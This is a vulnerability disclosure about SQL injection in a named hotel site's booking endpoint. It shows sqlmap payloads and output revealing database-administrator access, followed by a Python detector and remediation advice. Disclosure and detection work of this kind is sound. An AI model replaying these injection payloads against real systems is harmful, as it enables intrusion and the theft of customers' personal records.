
A Super 8 Hotels site has multiple SQL injection points that bypass its filtering (DBA privileges + five million customer records exposed)

Source: compiled by this site   Author: 路人甲   Date: 2015-09-28

Capture the request to http://cp.super8.com.cn/Hotel/List or http://cp.super8.com.cn/
http://cp.super8.com.cn/Hotel/HotelList (POST)
stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100&keycode=228&servercs=&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9
citycode, honour and servercs are injectable (the parameters in the Cookie, or the Referer, could also be tested for injection!~~~)
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: honour
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100&keycode=228&servercs=&honour=-4628) OR 7763=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(106)+CHAR(104)+CHAR(113)+(SELECT (CASE WHEN (7763=7763) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(102)+CHAR(113))) AND (4155=4155&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100&keycode=228&servercs=&honour=-4048) OR 3047=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (8777=8777&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9
Place: POST
Parameter: citycode
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100') AND 2424=2424 AND ('aDZF'='aDZF&keycode=228&servercs=&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100') AND 3376=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(106)+CHAR(104)+CHAR(113)+(SELECT (CASE WHEN (3376=3376) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(102)+CHAR(113))) AND ('QfCW'='QfCW&keycode=228&servercs=&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100') AND 7647=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ('iwOc'='iwOc&keycode=228&servercs=&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9
Place: POST
Parameter: servercs
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100&keycode=228&servercs=-6013) OR 1049=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(106)+CHAR(104)+CHAR(113)+(SELECT (CASE WHEN (1049=1049) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(102)+CHAR(113))) AND (3379=3379&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100&keycode=228&servercs=-1418) OR 3789=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (5903=5903&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9
---
[01:57:05] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: citycode, type: Single quoted string (default)
[1] place: POST, parameter: honour, type: Unescaped numeric
[2] place: POST, parameter: servercs, type: Unescaped numeric
[q] Quit
> 0
[02:00:23] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2012
[02:00:23] [INFO] fetching current user
[02:00:23] [INFO] resumed: sa
current user:    'sa'
[02:00:23] [INFO] fetching current database
[02:00:23] [INFO] resumed: crs2
current database:    'crs2'
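The sqlmap listing above shows three distinct techniques against the same MSSQL back end: an error-based probe that wraps a CHAR()-built marker in CONVERT(INT, ...), a time-based "heavy query" that cross-joins sysusers seven times as a delay primitive, and a plain boolean tautology appended after a quote-and-parenthesis breakout. From a detection standpoint those shapes are recognisable in the decoded POST body before the query ever reaches the database. The following Python scanner is an added example written for this page, not code from the report, from sqlmap, or from the hotel site; the rule names, the functions (classify_value, scan_body, request_body, scan_samples) and the BASE/SAMPLES dictionaries are hypothetical, and the sample bodies are constructed by substituting three of the payloads quoted above into the benign request from the report.

```python
import re
from urllib.parse import parse_qsl, urlencode

# Hypothetical detector (added example, not from the report): scans the
# form-encoded body of a POST to /Hotel/HotelList for the three payload
# shapes sqlmap used against citycode, honour and servercs.

# Signatures for the injection techniques visible in the sqlmap output.
# They are matched against each decoded parameter value, case-insensitively.
RULES = {
    # Error-based on MSSQL: CONVERT(INT, ...) wrapping a CHAR()-built string so
    # the failed conversion echoes attacker-chosen data in the error message.
    "mssql-error-based": re.compile(
        r"CONVERT\s*\(\s*INT\s*,.*CHAR\s*\(\s*\d+\s*\)", re.I | re.S),
    # Time-based "heavy query": a self cross-join of sysusers used as a delay
    # primitive when no WAITFOR is available.
    "mssql-heavy-query": re.compile(
        r"FROM\s+sysusers\s+AS\s+\w+\s*,\s*sysusers\s+AS", re.I),
    # Boolean tautology after a breakout: AND 2424=2424, AND ('aDZF'='aDZF
    # (the closing quote is supplied by the application's own query string).
    "tautology": re.compile(
        r"\b(?:AND|OR)\s+\(?\s*(?:(\d+)\s*=\s*\1\b|'(\w+)'\s*=\s*'\2'?)", re.I),
}


def classify_value(value: str) -> list[str]:
    """Return the names of every rule that fires on one decoded parameter value."""
    return [name for name, rx in RULES.items() if rx.search(value)]


def scan_body(body: str) -> dict[str, list[str]]:
    """Decode a form-encoded POST body and report the suspicious parameters.

    parse_qsl undoes the percent/plus encoding a browser or sqlmap applies,
    so the rules see the same text the database engine would receive.
    """
    findings = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        hits = classify_value(value)
        if hits:
            findings[name] = hits
    return findings


# Constructed sample traffic: the benign request from the report, then three
# of the sqlmap payloads it lists, each substituted into its parameter.
BASE = {
    "stime": "2015-09-01", "etime": "2015-09-02", "roomnum": "1",
    "citycode": "110100", "keycode": "228", "servercs": "", "honour": "",
    "pageindex": "1", "sorttype": "1", "landMrk": "", "djq": "", "pagesize": "9",
}


def request_body(**overrides: str) -> str:
    """Form-encode BASE with some parameters replaced, as the client would send it."""
    return urlencode({**BASE, **overrides})


SAMPLES = {
    "benign": request_body(),
    "honour-error": request_body(honour=(
        "-4628) OR 7763=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(106)+CHAR(104)"
        "+CHAR(113)+(SELECT (CASE WHEN (7763=7763) THEN CHAR(49) ELSE CHAR(48) END))"
        "+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(102)+CHAR(113))) AND (4155=4155")),
    "servercs-heavy": request_body(servercs=(
        "-1418) OR 3789=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,"
        "sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,"
        "sysusers AS sys7) AND (5903=5903")),
    "citycode-boolean": request_body(
        citycode="110100') AND 2424=2424 AND ('aDZF'='aDZF"),
}


def scan_samples() -> dict[str, dict[str, list[str]]]:
    """Run the scanner over every constructed sample and return the verdicts."""
    return {label: scan_body(body) for label, body in SAMPLES.items()}


if __name__ == "__main__":
    for label, verdict in scan_samples().items():
        print(f"{label:18s} {verdict or 'clean'}")
```

Run as a script it prints one verdict per sample; the benign body comes back clean, the honour and servercs bodies trip both a technique rule and the trailing tautology that sqlmap appends to balance the parentheses, and the citycode body trips only the tautology rule. Two caveats from the listing itself: the WARNING line notes that tamper scripts can alter the wire form of a payload, so this kind of signature match is a compensating control for the request log or WAF, not a fix; and the fact that the application runs as 'sa' means the fix is both parameterised queries on the ASP.NET side and a least-privilege database login.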

